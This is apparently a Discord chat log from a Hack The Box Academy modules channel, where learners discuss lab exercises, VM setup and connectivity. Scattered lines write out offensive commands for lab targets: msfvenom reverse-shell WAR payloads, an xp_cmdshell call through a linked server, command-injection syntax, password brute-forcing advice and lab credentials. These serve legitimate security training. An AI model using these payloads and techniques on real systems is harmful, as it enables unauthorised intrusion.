#modules

Hey guys. i have a doubt about how htb works actually. the thing is i wanted to go for CPTS. is there any payment procedure for studying the modules. or is it like just for the certificate examination?

hey guys i need help my academic email's domain is not in htb current list of valid academic domains I want to get an education discount

where can i start from

can anyone help me with this

WINDOWS PRIVILEGE ESCALATION: Windows Privilege Escalation Skills Assessment - Part I
Question:
Find the password for the ldapadmin account somewhere on the system.

I got the NT/Authority cmd but can't find this one. Really getting exhausted
Any help????????

The results I got back...which is none.

nvm , I see I can get ip addresses using the ||fping -asgq 172.16.6.0/24|| method.

Can anyone explain why we change ip value to ;ls; instead of just ls in the web proxy module?

They didn't really explain that syntax at all.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@jolly jackal

ok thank you man

This server doesnt endorse illegal activities and you can face a ban for it. I recommend deleting your messages and being smarter about admitting to shit.

i was joking

I dont care and neither will mods

ok

i will keep this in my mind from now

; closes off a command in the shell. Your ending the previous command, starting ls and then ending it to truncate potentially the rest of the commands. Its similar reasoning behind doing SQLi and starting with union and ending by commenting out the rest

Foung these files but no password here for ldapadmin

I haven't done this module, but have you tried -hidden?

no

what is base terminal

where is it

can anyone help me i stuck in the starting

Utilizing Google and search features will help you.

If you've never touched a linux device in your life: diving into hacking is gonna be an uphill fight vs things that are considered "fundamental" and assumed knowledge

hm

but i cannot open another instance

i have to wait for the tomorrow

Yes: free users get one spawn of the in-browser vm per day

can you help me with it

ya

Can't walk you through something if you can't view/see it

can you show me how it is done

No

do u have any video of it

This field is full of independent research

Learning how to be self-reliant on your own research is important

Google is a very powerful search tool

but that one instance per day is getting me

Then learn how to set up your own vm

(Virtual Machine)

if you totally new check this

do u have any video of it

Utilize Google

waht should i check

ok

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I don't believe in holding hands through a problem

not even me

No

i search about base terminal in brave but it shows ubuntu for some reason

I dont know you, nor do I have any personal investment in you

ya

Most linux distributions terminal is a universal term

i said i also believe in not holding hands through a problem

It, generally, refers to the command line environment in linux

hmm

@jolly jackal the linux introduction will help a lot

ok

thanks for your help :D

download VMware/Virtual box

download parrot ISO

then its just standard install

Bashcrawl is a good little game to learn basic commands

https://academy.hackthebox.com/module/details/18

hmm

It's something you can download and run completely in the terminal

:)

:D

https://www.parrotsec.org/download/ https://www.vmware.com/ca/products/workstation-player.html

It even gives you a starting point for the commands

nice

gotta give it a try

first i gotta need to download vm and parrot os

btw can i use other linux os for this ?

There's a "setting up" module

if a was where you are I will first do this

You can use any OS you choose

then this

great

Parrot is gonna be similar to pwnbox though

esp the "HTB Edition"

hmm

Parrot just has a bunch of repositories [repos] related to offensive security tooling

(thats what pwnbox runs - with a few tweaks)

ok so i am gonna prefer it

hm

it's been mostly reliable for me ¯_(ツ)_/¯

ok

Like any OS there's quirks

But you can easily overcome or bypass with the application of grey matter

Lot of stuff pre-installed aswell

ok

If you use another OS i.e. ubuntu, you'll need to install tools manually

which is good or bad depending on what your doing

so parrot will be the best

But parrot has everything you need for acad

no arch is the best , JK

it's mostly good for its intended purpose ¯_(ツ)_/¯

i think kali linux might also have the same thing

The main reason parrot is pushed is bc they are partnered with htb

my friend use linux and he told me that it is also good for this things

ohhh

Kali is too bloated for me, too many default programs that I'll never use at startup

hmm

they basically do the same shit , just preference matter

^

Some people have shitty experiences with parrot and switch to Kali, and vice versa

hm

ok

at the end is not abt which distro you use , it's about ur skills

hm

BRB hacking nasa with a firestick

hahahahahah

hey i am download parrot os and there is three option

iso
virtualbox
utm

Iso

ok

Or if you're using virtualbox, the virtualbox option

btw why not virtual box

ok

The virtualbox option is a pre-made one

hmm

i just installed virtualbox

you can use virtual box , or use the iso and setup it yourself

Meaning you don't really get to make your own user and such

The iso can be used to install in vbox

it's the easiest way

ok

There's documentation on the parrot website on how to install

ok

im back after a massive break

i changed my name alot so idk if u guys remember me

bro tf parrot virtual box is 6.9gb

We don't 🗿

i remember u tho

i am still noob 😦

hhhh it's a whole OS so ...

Yes because it's mostly pre-configured for quick start

man i do not have any wifi

gotta need to ask for someone's pass

It contains some settings and such for it to be imported into vbox

hmm

i don't understood what u said

The virtualbox download is a .ova file for virtualbox to import. .ova files are vm files that contain the whole OS and related VirtualBox settings for minimal setup

hmmm

got it

thx :)

the Parrot instance on active directory freezes over SSH every 5 mins

like I swear why would I need to ssh to do stuff with the windows instance?

In some instances rdp is disabled or a user you gain access to doesn't have remote desktop privs

(They may have remote management privs though through rm/ssh)

also the lag is over ~800 or 1000ms from SEA to EU

fucking hell there is no academy server in SEA

At least not currently

There's a pwnbox server there, so maybe they'll expand the vpn servers for academy there

maybe uploading mosh-server into the instance gives me some local echo but with no scrollback

so maybe I would need to dump the output by redirecting stdout into a text file

if i purchase student sub, do i get cubes for completing the tier 1-2 modules

Yes

Hi buddy's

can an1 help with installing kali linux

its saying inaccesible i can't even start it and its cuased by a machinwrap apperantly if an1 can help lmk

whose idea is it was to hide the damm Windows VM behind another SSH linux machine?

idk

am the only one who face rdp problems ?

if in pwnbox----> server issue

if in kali or personal VM download openVPN config. file with TCP NOT UDP

in VM it's weird It was working one hour before

It happens..

Even after switching to TCP is same thing happens I shut down it, come back after 1 hour or 30 mins so...

any hint?

quick google it for the error tells me that there's problem on the lab (Some ssl error ) , it works with rdesktop but very slow

Have you reached out to support?

no the problem from the labs , found ppl got the same error in the same section

https://academy.hackthebox.com/module/67/section/912

maybe because the windows version is too old

Ah, okay

I still suggest reaching out to support if you run into issues but I'll pass along that the module is causing issues

thanks but i don't think it's worth it

I understand, from our side it helps us understand where the issues are.

Can I get the RDP output screenshot?

for sure

Were you on TCP or the UDP VPN?

I tried with both , the same

Same on other VPN servers?

tried on eu 1 and 2

I don't remember having problems with that but yeah it's windows server 2008

It's a known issue now, it's something we're still looking into what's causing it

yeah ppl got the same issue https://forum.hackthebox.com/t/windows-server-issue-with-rdp-connection/267091/2 , but what do you expect from windows server 2008 ?

ssh is borderline unusable for me unless I upload mosh-server into the server but I would lose scrollback

Same module section?

yeah

Kk, thank you

like the damm vuln AD machine got locked behind another fucking parrot vm

every 5 sec it freezes and like a mins later the server would send the echo back

have you reached out to support?

wait there's ssh in this section ?

https://academy.hackthebox.com/module/143/section/1455

aaah you mislead her

Yeah that's dif :p

Alll good though, I'll pass it along

What is the issue with SSH?

borderline unusable

Any errors or?

Is it disconnecting?

the delay is insane even with a 1gbps internet (my uni's)

I need more detail. Slow in response or what you type in

Please reach out to support and don't turn this channel into troubleshooting vpn connectivity issues

yeah alright

very slow response

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

I'll reach out there

@limber river
xfreerdp /v:10.129.32.4 /u:htb-student /p:HTB_@cademy_stdnt! /tls-seclevel:0 /timeout:80000

tysm it works , great troubleshooting skills

Hi, wanted to ask how much time it takes to complete the Penetration Tester learning path

from 1 week to 1 year lol

it's really depends on ur lvl , how much time you dedicate for it , so no one can answer

How much do you reckon it would take if I were to do it 21 hours a week

depends on your level

There’s no definite answer; but average is ~3 -6 months

Hmm alright, thanks!

How much time did it take you?

I’m not done with the path yet.

all I can tell you , it's great content

Ah okay, thanks a lot you guys!!

Tbh you should just do it at yo own pace.

Hello, can someone give me hints for Intro to whitebox pentesting skills assessment? I have located a possible injection point, but I just can't get a working payload. You can DM me, and I can provide more information.

need help on https://academy.hackthebox.com/module/67/section/912 , can exploit the ||ms10_092_schelevato|| even with process of x64

I respawn the lab still the same problem

I have a question regarding host from offshore lab, is this the right channel to post the question? i am new to discord channel of HTB.

Hard to do any modules when the spawn machine is unstable

the windows labs , specially with rdp are too slow

Has anyone completed the Attacking Authentication Mechanisms yet? Currently stuck on OAuth brute forcing weak access tokens. Found many ||tokens|| but can't move forward.

edit: solved

Hello, I have some issues with the labs. There are slow, and even reseting the target/ changing the VPN doesn't change anything. Does anyone have a fix ?

They are!

There is no fix, unfortunately. The only thing you can do is try to change VPN

hey

i just joined

idk what to do

i am stuck at somethin

WINDOWS EVENT LOGS & FINDING EVIL

Tapping Into ETW

i trun silketw on and then start seatbelt after this i check the etw.json file amd iit just gives me a billion ProviderGuid with no ManagedInteropMethodName at all

did you let silketw running while you ran seatbelt?

I wan't add my progress in the academy on my CV.

i create a student id in the settings.
But how i addit it?
It is only HTB-xxxxxxxxxx not a link. There stand sum thing over an api where i can find the api

you can get a transcript in your account settings, that's about it

i know but there are as second option the student id

imo if the employer doesn't know about htba, they aren't gonna care. if they know about it, providing the transcript is easy enough

it's like the top 1% thm thing, no one really cares about it

you need a unique token to view the information so I guess an org has to request one or something

what the hell even is this

[06:14:02:752] [9892:9893] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[06:14:02:752] [9892:9893] [WARN][com.freerdp.crypto] - CN = MS01.INLANEFREIGHT.LOCAL
[06:14:13:080] [9892:9893] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[06:14:13:082] [9892:9892] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

i have a user that can rdp i cant rdp

-_-

12 packets transmitted, 9 received, 25% packet loss, time 11764ms 😄

eu 1 works fine

did you just started the target? give it a bit to spawn

o ok

https://tenor.com/view/mr-rogers-nightmare-clown-gif-5401671

I give up I can't study like this, probably going to wait today

on tcp on eu 1

Finally. https://academy.hackthebox.com/achievement/873508/143

99.79% done

yesh

Hey there,

Does anyone know how I can access the module finished page that comes up, once I finish a module? It has some interesting information which I would like to access at any time and not just once after I finished a module.
The URL is https://academy.hackthebox.com/module/finish but only works dynamically.

Pull the module up, go to the last page in the module, and then click finished at the bottom. That will take you back to the module completed page.

Stupid me. Could have checked that as well. Thanks for running those miles for me. From the UX, I expected the finished page to pop up, once I finish a module, because I also features a "retake module" button.

I don't think you're stupid dude. I ran into the same issue when I first started the course, and thats the only way I've seen to get back to that completion page. I try to go back and do the suggested boxes for more practice when I get tired of going through modules.

yea, that's what I wanted it for also.

Im in the RDP and SOCKS tunneling with SocksOverRDP section of the pivoting and tunneling module. The issue im having is that the last ip im supposed to get to.:172.16.6.155 (jason:WellConnected123!). Isnt reachable from the windows host we have access to. Also the host used in the example, is reachable but has seperate credentials that i dont have.

Also a question to the sqlmap Essentials module. Does anybody have an idea what the injectable query of case7.php?id=1 looks like in the code? I had no problem solving it, but toying around with the vector and the boundaries, it behaves in a way that does not make sense to me. I always try to think about the query and the position of the injection, when I try to find SQL injections. But with this one, I have no freaking clue where in the SELECT statement I am injecting into.

I normally look up the syntax of the query and think about, where the injection point might be. For this I take the syntax e.g. for MySQL from https://dev.mysql.com/doc/refman/8.0/en/select.html.

they are hard to follow true, specially when the RDP on windows is slow xD

https://academy.hackthebox.com/achievement/873508/path/16

damn

#modules message

Thatl'll help with the TLS issue

damn htb. Stop making me more nervous here

ye i fixed it with switching from eu 2 to eu 1

Which section and VPN?

VPN is above 😛

F. I'm blind.

So for the ||172.16.6.0/24 subnet from the AD enumeration and attacks assessment and I found 3 internal IP addresses for that subnet:

nmap scanned all 3 internal IP addresses and 2 came back with different services.

I tried logging into one of the internal ip addresses on that subnet with the xfreerdp tool(and initially using the credentials in the module) and it came back with an error.

So I would likely need to find the credentials using the netexec tool and I would likely need to use a mutated password list and username list(like the ones found in the password attacks module??)||

https://academy.hackthebox.com/module/143/section/1278

Hey mods just a heads up- the pycrypto package in this bash script (https://academy.hackthebox.com/module/112/section/2117) no longer seems to work with the latest version of python3, looks like it hasn't been updated in at least ten years. If the pycrypto package fails installation the rest of the packages on that line (passlib, python-libnmap)fail installation too and have to be installed individually. However, this(https://pypi.org/project/pycryptodome/) is a fork of that package and seems to be working so far (able to run odat.py -h)

MODULE: ATTACKING COMMON SERVICES

📢 Hey everyone! 👋

I've been on the hunt for the mssqlsvc user in our database since yesterday, but no luck so far. I've gone through the usual spots like sys.database_principals and a few others, but it's like looking for a needle in a haystack. 😅

If anyone has a friendly hint or knows a corner I might not have checked yet, I'd really appreciate the guidance! 🙏 A fresh perspective could be just what I need.

Thanks a bunch in advance! 🌟

This is supposed to be the easy part, yet I can't find any user or any entry that looks like a hash.

What section is that?

SQL Databases (Attackin SQL Databases)

Hi Guys , I am stuck at Password Mutation section , I have created mutated password list from the resources and I tried to Hydra the FTP and Crackmapexec SMB with no luck , The Vm just terminates , Can anybody shed some light? Thanks

What is the question? Are you finding a user /password ?

What is the password for the "mssqlsvc" user?

i am enumerating since yesterday, but i cant find shit... i mean it cant be that hard, i missing something obvios

Try targeting ssh

Tried ssh brute but it was even slower

Did you try all the commands in the section ?

Yeah it takes a long time but you’ll eventually find it xd

there are like 3 or 4 databases where i have access as the current logged in user. but i cant find anything in there...

i tried the commands yes.

xP

There was an attack shown in the section that lets you capture the ntlm hash.

doesn't ftp work? or is it a different section

I think it might be a different section.
I’m pretty sure it’ll be ssh and smb.

Tried FTP as well

It has FTP , SMB & SSH

If there’s ftp, then @next bronze may be right.

I did get mine through ssh tho. But it took forever.

Did you use Hydra or Crackmap?

just to make sure, how many lines in your mutated password file?

^

holy shit i got it

Hydra, CME doesn’t support ssh

please give me a gun to shoot myself.... what the hell i should read the modules instead of freestyling it

94,044 lines

It happens sometimes.
Just have to try everything

Did you manipulate the Thread # ?

ssh can't handle too many threads, the default is 4

yup, Same as rdp.

So I have read only to id_rsa. I run VIM on it - how do I save the file directly to my machine>?

i feel so dump but now I can move forward and make the same mistakes the next time 😉

just copy the content and save it on your attack machine.

I did end up doing that, was wondering if there was another way

But thanks 🙂

Hi , I am doing the final engagement of the "shells&payloads" module, attacking the 1st target now.

msfvenom -p java/shell_reverse_tcp lhost=172.16.1.5 lport=1234 -f war -o shell.war
172.16.1.5 is the IP address of my foothold machine
I deployed the webshell and tried to access it, but got HTTP 500 error, anyone knows the reason?

did you set up a listener?

yes

any tips to deal with the sluggishness that is the AD module? spend more time to input any command than actually running anything

using netcat, I am following this article https://null-byte.wonderhowto.com/how-to/hack-apache-tomcat-via-malicious-war-file-upload-0202593/

try changing vpn servers.

using the pwnbox

then server location maybe

already using the closest to me now, everything in the pwnbox is fine, really just from there to the target. even ssh is really slow

you are on the right track with the IP/ lhost

ok, thanks

you should try a different payload specifically jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xx -f war -o revshell.war

that should work

Thanks for the help with VIM, finally got root. Turns out I was messing up the copy and paste with VIM somehow

Hmm, I tried the payload with MSF directly and it says it's not a compatible payload for exploit(multi/http/tomcat_mgr_upload)

no, just use multi handler to catch the shell or just use nc

ok

thanks, got the shell!

glad to help

when I list the payloads of exploit(multi/http/tomcat_mgr_upload) , I did see "java/jsp_shell_reverse_tcp", not sure why it then said it's not compatible...

I think you needed to use show targets option but I am not sure

Not going to lie.. this acadmey course is so good

only one target,

Exploit target:

Id Name

0 Java UniversalExploit target:

yeah i thought so.. I had a similar problem rooting a box some time ago, I had to manually upload the .war file

yeah, manual upload works

but how do you know we have to use the JSP one? you tried one by one?

Anyone have a few minutes and familiar with the File Uploads assessment? Long story short, trying to get upload.php and successfully injected my SVG code, output is huge, but there are extra characters it, so base 64 decoding it is proving to be a challenge, just need to know what portions of my received output I have to decode

Apache Tomcat is used for deploying Java-based web applications, including those built with JSP.
so when the intial payload wasnt working I had to look for a JSP one.

👍

cut right after "base64," to the end?

Actually it's just kicking back my image Im using to hide my SVG, I'm having a tougher time with this one than I did on DNS lol

Hi

Does anyone know why it is taking a millennium to load anything within zap

Hi, I'm working through the "Introduction to deserialization" module Page 7 (tools of the trade). The challenge says " Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq". I have a reverse shell but I actually don't have a clue what it's wanting. Either I'm being a complete dumb dumb or the question isn't very clear at all. Don't suppose anyone is able to advise?

Nevermind... just a skill issue

a general question
if I know a module exists in MSF, like "/usr/share/metasploit-framework/modules/exploits/123456.rb"
but I cannot find the module with "search" command, is there a way that I can specify the module with the absolute path in MSFConsole?

Question about the File Transfer module of CPTS

For the linux file transfer, it is advised that we run
sudo python3 -m pip install --user uploadserver
While I understand they want this module to be ran as root to bind to the 443 port, hence the root install, is it a good-enough reason to advise pip to be ran as root?
At the end of the day, we could install the package as a non-root user and bind to port 4444 for example.
Am I missing something?

You can generally just specify use exploit

I tried "use exploit absolute_path", not working

also tried "use absolute_path", it doesn't work either

sudo in this instance of installation is for it to be usable by all users, you can use the uploadserver without root to bind to ports >1024, the first 1024 ports are reserved ports, thus requiring system/root privs

marcie

I meant, Replace 'exploit' with the exploit name, not path

the error seems to suggest your reg save is empty

did you transfer them correctly

do you know how to turn off the pretty chrome dev tool http request crafter and make it raw?

No

It's likely a button

if the module is already in the database / imported, you can update the database

Thanks Marcie

Any staff able to help?

"Introduction to deserialization" module Page 7 (tools of the trade). The challenge says " Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq". Revshell is simple but i'm not sure what the question is actually after?

I believe the module is there by default, maybe I can copy the full module name from the .rb file

I mean... it's fairly clear imo

It's not asking for a revshell btw, just rce

And how would one get the user-id

there is no user "dnsmasq"

Perhaps it's a service

if that's the case then the question could definitely be clearer. Do services have user-ids?

that's what the error means, make sure the path is correct

Yes, www-data is a service and has a uid

this is important, even if the module is there, it's not necessarily loaded, that's why we cannot find certain modules with the "search" command in MSFConsole

reload_all and search solve the issue

ahh that clears it up for me, got it now. Thanks.

I'm currently doing the file transfer module and I cant connect via RDP to the windows machine:

Try single quotes around the pw

Hi guys, need help for Attacking Thick Client Applications in module Attacking common applications => i'm trying to get the creds out of restart-service.exe, however I cant find the DOS MZ executable in the memory map view, so i cant dump it

Hello my dear HTB people.

Got a question on the RDP and SOCKS Tunneling with SocksOverRDP in the Pivoting module.
So: I transferred the .dll, however even when I tried to run it as admin it didn't work.

disable UAC and try to transfer it over again

UAC as in user access control?

Ohh, user account/

Aight, will do.

hey guys! I am new to HTB. I wanna solve the Survival of the Fittest challenge but I'm not getting how to. I started an instance and it gave me the following docker host 83.136.252.214:55914. What am I supposed to do with this? It's a blockchain challenge and I need to interact with the smart contracts.

This article here also didn't prove much help.

@fathom pendant I've restarted the box and tried with ' instead of " in my local terminal without the pwnbox. It worked thx

Wrong room

what's the right one?

This channel is for academy modules, read #welcome

There's a #challenges channel

i don't have access to this channel 😦

First statement, read #welcome

Malware module is the best one when the RDP is running SLOW xDxD 🤡

Real world incident report how to use my workstation

Hey everyone, I am doing the Live Engagment section of the Shells & Payloads module. In order to continue I have to login to the target machine's tomcat manager. The hint provides the creds to get in, but would I be able to find these creds without using the hint? I've looked through smb shares and found nothing. It's a little cheesy if they force you to look at the hint to get the creds.

Desktop

WOW haha how'd I miss that

I swear this question has been asked like at least a dozen times

You can likely search it in the discord

OK, time for a humblebrag, took me 12 hours and at end, I changed my process entirely, used a different way to upload the file without using Burp which was giving me headaches... I learned my lesson if at first you dont succeed , try a different technique instead of trying again using same processes...

Im on the Intro to Assembly Language Conditional branching and trying to solve this question: "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?" I have stopped the loop but I don't think I understood what hex value is it trying to ask off of me. Need some clarification and guidance on the matter

Any tips as to how long it approximately takes to crack username/pw on Password Attacks Skills Assesment Easy once you pick the correct username/password list?

Same as earlier challs in this module (very quick once correct wordlist is found)?

Based on my experience with those modules less than 10 mins , longer than that and its likely a problem with wordlist. Use the wordlists that are with the module and then use hashcat to mangle them to increase complexity and build a larger wordlist

Could someone help me, I have an exercise from the academy, several people have already confirmed that the answer is correct, but the exercise is not accepting

DM me

plsss stfu

Hi guys I'm stuck in the attacking common application module, in particular on attacking splunk, I followed the lessons, changed the run.ps1 with my ip address but cannot spawn a reverse shell when I upload the tar.gz file... any help?

Hey guys can anyone help me with getting back a full shell in Playing Pong with Socat?

im really stucked and i am getting back a revershell over der Pivot host, but the shell is always closing (Problem is solved)

am i the only one facing summoning issues? 🥲

Just drink some mana potions

thx

Ofc can't forget

whats that now

i cant keep drinking anything u give

Wisdom

solved

gimme more i need a lot

https://tenor.com/view/paradise-trippies-trippies-gimme-the-loot-wooh-woo-gif-25579620

mana didnt work

that Password Attacks module was so fking boring man

important tho

free

the palestine

🇵🇸

go away

👍

question

yes

Answer

bro got denied

why am i unable to send images to aid in my question?

Because unverified users can't send images

huh. how do i get verified? i agreed to the rules

YOU REPRESENT NO ONE BUT YOUR SELF

Read #welcome

How does one "shut your fuck up"

stop typing

Personally, with a drink

yk valid

They got muted

https://tenor.com/view/captain-america-marvel-avengers-gif-14328153

Guess they found out how 🤣

fr

English

I almost did a pre-emptive ping earlier tbh bc I could almost predict it

there we go

ok

Also now you'll have access to more of the server

why would I esculate that to a tier 2/3 analyst? I picked "Nothing Suspicious" but was wrong. the way i see it, someone tried to login, it failed, and quit to go get their account fixed or something.

Failed login attempts to a disabled user

That by itself can be suspicious

The keyword being here [disabled]

It's not a lockout, it's a user account that's been disabled

1> EXECUTE('EXEC xp_cmdshell 'dir ''C:\Users\Administrator\Desktop'' /B'';') AT [LOCAL.TEST.LINKED.SRV] ]
2~ go
3~

why dont it work it just nothing popping up

its not frozen

but no command work?\

You have an open quote

oh i c how do i cance that cmd

Ctrl-c

hmm. so someone trying to login INTO anni (disabled user) is suspicious? I was reading the log as "Anni tried to log into their account, which was disabled". thats why i was confused

I'm sure you can click on the event to learn more

also how do u kno its open quote and how wud u quote it properly?

After the /B it looks like you have a "

yeah i added IP address to the list and it looks much more suspicious now. thanks

yes

i did

ipv6 looks suspicious ?

No

I have no idea why my ligolo IP is down.

I tried restarting my Virtual box and reseting IP with "sudo ip link set ligolo up " but no luck.

is it a glitch?

bam !

I'm having trouble with snmp. I brute force community strings but when I do that I get this output and I don't see a community string there:

10.129.74.233 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

This is for SNMP section of footprinting module.

I don't get why I get output but not a community string even when brute force?

can someone help?

“Public”,no?

hold on

ok so what? its not like I can access it from a web browser

You mean why is that important?

right well I mean why is it important that its public if I can't access from web browser? can I do it with nmap?

will nmap get me results I need?

hold on I played with nmap and now its listing various services on it

You can connect to snmp via snmpwalk and other tools

And you can read/write depends on the permissions of the community to the system settings

I.e. https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp/snmp-rce

Web Proxies module, "Try using request repeating to be able to quickly test commands. With that, try looking for the other flag."

As of right now I am looking through the nodes_modules directory, does anyone know if I am on the right track?

I've looked at all the other content within the flag.txt directory to no avail. nodes_modules is the only directory that seems to lead anywhere

but then again I am having trouble accessing the contents within nodes_modules and public

I am trying this and its not working:

┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
NIX02: Unknown Object Identifier (Sub-id not found: (top) -> NIX02)
┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c NIX02 10.129.74.233
Timeout: No Response from 10.129.74.233

will read link you gave emma but I'm wondering if I need to or if I am on right path and getting one minor thing wrong

or if I'm doing everything wrong because I'm missing something

this also hasn't worked:

┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c Linux NIX02 10.129.2.26
snmpwalk: Unknown host (NIX02) (Invalid argument)

is anyone able to help?

Im doing hard lab in Password Attacks module, im trying to log-in with Johanna user but im not able to find the pwd, do i have to do boring stuffs like searching the db of previous machine?

no you just need to crack it

The community is just public

Nothing more

ok

so I should enter the word public into it?

maybe im using wrong list, ive tried to generate a mutated one too

-c public

ok thanks

are you using hydra>

both hydra cme

hydra didnt work gave me errors

cme should be able to crack it

try the mut_password.list wordlists

it should work

i did bro

i just cracked it yesterday using that wordlist and crackmapexec :3

how many lines does your mut password list has?

94044

the password should be there then 100%

blud

just try again with crackmapexec and wait for it lol

anyone have any pointers

i cannot even use multithreads 💀

I am searching through the node_modules directory, am I wasting time or am I on the right track

its wont take more than 10min i guess

Do you have to use the rockyou.txt password list on the kali machine or do you create your own mutated_password list for the AD enumeration and assessment part 1 box

keypass pwd doesnt work omfg

It should ||for the app||

Hey @fathom pendant do you know if I am on the right track for web proxy module burp repeater section

I've been looking through all the content inside the node_modules directory to no avail, I've already looking through the "Public" directory as well to no avail. Am I on the right track ?

Haven't done that one

look in other dirs

maybe you can use the find cmd

Thank you

I was going at it for about 2 and a half hours straight, imma get a snack real quick, and then I’ll update u @lusty thicket

Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer. ```

I cant find a user and password by using crackmapexec, evil-winrm, and hydra by using the user and mutated passowrd list given in module. Any tip to navigate me in right direction?

Try other lists, or maybe you need a local-auth flag or something

Can you explain local-auth and other lists?

i cant mount the

||Backup.vhd||

i tried doing it with guesmount as i saw in a blog but it shows the file format is unknown not ntfs

when i transfer the .vhd to my machine through smb its doesn't transfer all contents?

cant you just get *?

i did get

but it doesnt transfer all contents

so when i try to mount the .vhd file i fail

i've been stuck in this hard lab for 2 days rn lol

did you manage to mount the vhd file?

no

isnt it encrypted?

anyone been through this module? Any tips?

how do you know if it encrypted or no?

in theory with file bin, no?

doesnt seem so btw

@crystal steeple

bruh i cant get that file

hmmm ngl this is something new to me :3

come pvt i found smth

finally finished the daunting password attacks module

feels like i got the cpts lol

who is down to do a easy machine together?

Hey guys, I need a little help with nmap module

I'm in the firewall evasion section in the academy and I'm trying to run a stealth scan. It wants me to find the OS running on the target, and the hint states that admins in this scenario don't want hosts in the same subnet talking to each other, so naturally I run a scan to find other hosts that I can use to spoof my scan.

However, when I try run my scan with the -S and -e flags I get an error stating nmap "failed to determine a route to [target]. Am I missing something here?
I know that the decoy IP needs to be alive so I ran a scan for other active hosts on the network, but no matter what IP I use I get the same error. Anyone have experience with stealthy nmap scans can maybe give me some pointers?

You can't spoof scans on a host you don't control

Also spoofing is not required

If I can't spoof, then what would be the next option? A decoy?

I'm assuming the module wants to practice what I've learned but I don't think it's clicking yet

That would explain the error, I guess

you’re over-complicating it

Think dumber

You're right

The answer was right in my face, nvm

Path Bash Scripting; Module Comparison Operators:
Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

I know i have done something wrong with the first if comparison parameter what else?

👏

how can i know if all my ports are closed?

netstat -ano

then what should i do

what will happen if i close all my ports

hey

but why, some services need them open

your pc is likely behind a router anyways

so how can i know which port to keep open

and the rest should be closed

you don't really need to manage the ports if it's your personal machine

what are you trying to accomplish

You only really need to worry about ports if they're exposed to the internet.

ports are normally open your PC

your router is what blocks external access

in the windows PE skillAssessment 1 , is it intended to answer the questions in order ? || I needed system privileges to answer the second question ?||

i did not understood

so do i need to change the rule in which i closed all the port in both inbound and outbound

I just saw a video of ebola man in which he used angryip scanner to get ip and somehow he got a open port of 445 or somthing like that and then he window shares and he got to see his system files

if you havent opened the port on your router

no one from outside your home network can connect

if you want to completely cut off your internet connection, sure

hmm

Outbound ports are what you use to connect to the internet

i just saw one of my port open

inbound ports is what people use to connect to you

hmmmm

on your pc, or on your router

in my pc

i use mobile hostpot

💀

this

if you haven't mssed with the router ports you're gonna be fine

i use mobile hostpot

but for security purpose

i don't want a random guy to check my system files

so what can i do to save myself from this

dont open ports on your router

so how can i close it btw i don't have router

https://tenor.com/view/dancing-duck-dance-duck-duck-ooontz-dance-gif-10943740227711557279

If you didnt manually open it

its not open

but still in angryip scanner shows that one of my port is open

guys i am new to cyber security and what did u recommend me to excell in it

even tho i closed all the ports in my firewall setting

On your PC? Or on your router?

pc

i do not have router

It doesn't matter

hmm

@acoustic owl

How are you connected to the Internet?

ya

i use mobile hostpot

This is a Router

wait how

never knew this

Your PC has an address such as 192.168.x.x, 172.16-32.x.x, 10.x.x.x?

did u know what those x variable are

bro tf how u did it

0-255

bro how did u did it

Magic 🤪

teach me

I know your ip

it's 127.0.0.1

how did u did that

https://www.rfc-editor.org/rfc/rfc1918

teach me man

i don't trust this link

then google

ok

https://tenor.com/view/hacked-hack-computerhack-virus-computerglitch-gif-14411709

bro am getting bullied here just because i don't know hacking

Legacy IP? Eeew
My IP is ::1

This has nothing to do with hacking.
These are network basics

and i don't even know that

who remembers that

128 bits is too much

teach me that

You a c developer ?

where can i learn is

google

That's not a problem either. You can learn it if you want

@next bronze can I dm you ?

what are those network basics

https://academy.hackthebox.com/module/details/34

based that you referenced an RFC.

hmm i have signed in it

how is refercing an rfc mean you're a c dev

just installing parror os might take some days

sure but what about

Then the fun really begins. 😃

if it's about that question unfortunately I don't remember

aaah okay

I think I've seen some people say that tho

bro tf i did not saw anything in that link

not sure how I did it, it's close to a year ago now

i only saw motivation

as a heading

that was a long time lol

yeah

btw which area should i choose for networking

can you tell me i wanna choose the right thing for netwroking

wdym by the right area for networking , are you talking abt vpn or what ?

that module is specifically the introduction to networking

the basics of it

no like i got to choose some areas

ohh

like secure coding and all those stuff

like the interest but i know nothing about any of those area

you mean areas in hacking ?

ya

like exploit and those stuff

like u might have got the same page

while choosing the area of your interest

idk how i got log out from that acc

it's ur first on the platform , they ask about ur interests right ?

ya

which one should i choose

i never heard the area of those name

those questions don't generally matter

hmm

you can not answer them, they don't give you any special access to anything

also a lot of the terms can be googled

THE ONE YOU LIKE MORE

hmm

i have never heard them

google them

hmm

You can also just not answer the question

lol it's not a requirement to answer those questions

you wanna be hacker , google is your friend

